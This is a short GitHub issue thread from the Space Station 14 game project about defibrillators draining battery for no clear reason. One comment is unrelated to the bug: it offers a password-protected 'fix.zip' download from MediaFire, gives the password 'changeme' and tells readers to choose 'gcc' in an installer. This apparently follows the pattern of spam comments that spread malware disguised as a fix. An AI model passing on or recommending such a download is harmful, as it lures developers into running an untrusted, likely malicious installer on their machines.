### ISSUE TITLE
Defibs drain battery, randomly, for no reason

### ISSUE THREAD

**Issue by Plykiya** [space-wizards/space-station-14#31468]
## Description

Could be on, could be off, at some point it just starts draining

I feel like the system is cursed and I don't want to look at the code yet

**Reproduction**

**Screenshots**

**Additional context**

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Plykiya** [comment]
related issue
https://github.com/space-wizards/space-station-14/pull/31392
